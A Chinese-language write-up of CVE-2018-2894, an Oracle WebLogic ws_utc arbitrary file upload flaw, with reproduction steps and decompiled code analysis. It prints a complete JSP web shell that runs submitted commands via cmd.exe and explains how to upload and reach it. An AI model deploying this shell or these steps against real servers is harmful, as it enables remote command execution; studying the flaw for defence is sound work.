CVE-2018-2894

漏洞影响版本：10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3

下载地址：http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip

漏洞复现

服务启动后，访问?http://localhost:7001/ws_utc/config.do

可以将当前的工作目录为更改为其他目录。以本地环境为例，可以部署到C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domainserversAdminServertmp_WL_internalcom.oracle.webservices.wls.ws-testclient-app-wls4mcj4ywar下

选择右边的安全栏目，添加JKS Keystores上传文件。假设chybeta.jsp内容如下：

<%@ page import="java.util.*,java.io.*,java.net.*"%> <HTML><BODY> <FORM METHOD="POST" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "n<BR>"); Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> 

抓包获取到时间戳为1531987145013，则上传到的位置即configkeystore1531987145013_chybeta.jsp

访问http://localhost:7001/ws_utc/config/keystore/1531987145013_chybeta.jsp

简要漏洞分析

在ws-testpage-impl.jar!/com/oracle/webservices/testclient/setting/TestClientWorkDirManager.class:59:

public void changeWorkDir(String path) { String[] oldPaths = this.getRelatedPaths(); if (this.testPageProvider.getWsImplType() == ImplType.JRF) { this.isWorkDirChangeable = false; this.isWorkDirWritable = isDirWritable(path); this.isWorkDirChangeable = true; this.setTestClientWorkDir(path); } else { this.persistWorkDir(path); this.init(); } if (this.isWorkDirWritable) { String[] newPaths = this.getRelatedPaths(); moveDirs(oldPaths,newPaths); } else { Logger.fine("[INFO] Newly specified TestClient Working Dir is readonly. Won‘t move the configuration stuff to new path."); } } 

此函数用于改变工作目录，但其中并未做任何检测。

在ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/res/SettingResource.class:181中：

@Path("/keystore") @POST @Produces({"application/xml","application/json"}) @Consumes({"multipart/form-data"}) public Response editKeyStoreSettingByMultiPart(FormDataMultiPart formPartParams) { if (!RequestUtil.isRequstedByAdmin(this.request)) { return Response.status(Status.FORBIDDEN).build(); } else { if (TestClientRT.isVerbose()) { Logger.fine("calling SettingResource.addKeyStoreSettingByMultiPart"); } String currentTimeValue = "" + (new Date()).getTime(); KeyValuesMap<String,String> formParams = RSDataHelper.getInstance().convertFormDataMultiPart(formPartParams,true,TestClientRT.getKeyStorePath(),currentTimeValue); .... } } 

跟入ws-testpage-impl.jar!/com/oracle/webservices/testclient/core/ws/cdf/config/parameter/TestClientRT.class:31

public static String getKeyStorePath() { return getConfigDir() + File.separator + "keystore"; } 

得到要写入的路径storePath。

在ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/util/RSDataHelper.class:145:

public KeyValuesMap<String,String> convertFormDataMultiPart(FormDataMultiPart formPartParams,boolean isExtactAttachment,String path,String fileNamePrefix) { ... if (attachName != null && attachName.trim().length() > 0) { if (attachName != null && attachName.trim().length() != 0) { attachName = this.refactorAttachName(attachName); if (fileNamePrefix == null) { fileNamePrefix = key; } String filename = (new File(storePath,fileNamePrefix + "_" + attachName)).getAbsolutePath(); kvMap.addValue(key,filename); if (isExtactAttachment) { this.saveAttachedFile(filename,(InputStream)bodyPart.getValueAs(InputStream.class)); } } } ... } 

把上传文件的内容传到了storePath目录里，文件名满足fileNamePrefix + "_" + attachName。这过程没有任何过滤和检查：）...

条件：

• 需要知道部署应用的web目录
• ws_utc/config.do在开发模式下无需认证，在生产模式下需要认证。具体可见Oracle? Fusion Middleware Administering Web Services

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!